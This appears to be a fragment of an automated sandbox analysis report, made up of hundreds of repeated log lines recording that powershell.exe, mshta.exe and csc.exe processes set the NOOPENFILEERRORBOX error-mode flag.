                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
